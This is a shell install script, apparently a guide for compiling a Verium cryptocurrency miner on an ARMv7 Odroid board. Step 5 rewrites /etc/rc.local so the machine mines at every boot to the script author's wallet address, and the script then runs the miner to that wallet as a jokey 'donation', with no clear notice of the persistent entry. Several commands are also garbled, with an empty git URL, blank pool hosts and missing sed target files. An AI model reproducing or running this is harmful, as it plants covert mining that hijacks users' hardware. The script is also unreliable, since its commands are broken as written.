echo -e "\e[92mVerium Guide 1/6: \e[93mClone new miner source code into ~/verium/fireworm\e[39m" git clone ~/verium/fireworm echo -e "\e[92mVerium Guide 2/6: \e[93mConfigure NEON usage for ARMv7\e[39m" sed -i -e 's/-DUSE_ASM -pg/-DUSE_ASM -mfpu=neon -pg/g' ~/verium/fireworm/ echo -e "\e[92mVerium Guide 3/6: \e[93mCompile the miner using build\e[39m" cd verium/fireworm ./ echo -e "\e[92mVerium Guide 4/6: \e[93mMiner built.\e[39m" sed -i -e 's/"1way Miner: -----------------------------"//g' ~/ sed -i -e 's/tail verium\/nwayminer\/1waymine.log//g' ~/ sed -i -e 's/nwayminer/fireworm/g' ~/ echo -e "\e[92mVerium Guide 5/6: \e[93mAdding One-Miner configuration to Autostart\e[39m" sed -i -e 's/exit 0//g' /etc/rc.local echo "# New One-Miner configuration:" >> /etc/rc.local echo "nice --10 /root/verium/fireworm/cpuminer \\" >> /etc/rc.local echo "-o stratum+tcp:// -u VEXMki29ycW5vSt3MmdM5iwHqsHux91EMr.UpdateOdroid -p joe_rondx \\" >> /etc/rc.local echo "-1 5 -t 3 --cpu-affinity-stride 1 --cpu-affinity-default-index 5 --cpu-affinity-oneway-index 0 --cpu-priority 2 --api-bind --no-color >> /root/verium/fireworm/3waymine.log &" >> /etc/rc.local echo "" >> /etc/rc.local echo "exit 0" >> /etc/rc.local echo "" >> /etc/rc.local echo -e "\e[92mVerium Guide 666: \e[93mTesting the miner with a little joke... ;) \e[39m" echo -e "\e[91mALL YOUR HASHES ARE BELONG TO US!!11 ;)\e[39m" echo "Well, you may keep this running for a while as donation. Thanks! <3" echo -e "\e[92mThen get \e[91myour wallets address \e[93mhit Ctrl+C and mine for yourself!\n\e[39m" ./cpuminer -o stratum+tcp:// -u VEXMki29ycW5vSt3MmdM5iwHqsHux91EMr.OdroidUpdate -p joe -1 5 -t 3 --cpu-affinity-stride 1 --cpu-affinity-default-index 5 --cpu-affinity-oneway-index 0 echo -e "\e[91mReconfigure Autostart: \e[35m nano /etc/rc.local" echo -e "\e[92mHappy Verium Mining! \e[35m joe_rondx :)" echo -e " \e[94m_\e[34m_" echo -e " \e[37m_ \e[94m/ \e[34m\ \e[90m_" echo -e ' \e[37m/| \e[94m( \e[34m) \e[90m|\ ' echo -e "\e[37m( ( \e[94m\ \e[34m/ \e[90m) )" echo -en "\e[37m \ \ \e[94m" echo -n ' \' echo -e "\e[34m/ \e[90m/ /" echo -e " \e[37m\ \ \e[90m/ /" echo -e " \e[37m\ \ \e[90m/ /" echo -e " \e[37m\ -\e[90m- /" echo -e " \e[37m\ \e[90m/" echo -e " \e[37m-\e[90m-" echo -e "\e[90m V E R I U M" echo -e "" echo -e "\e[39m"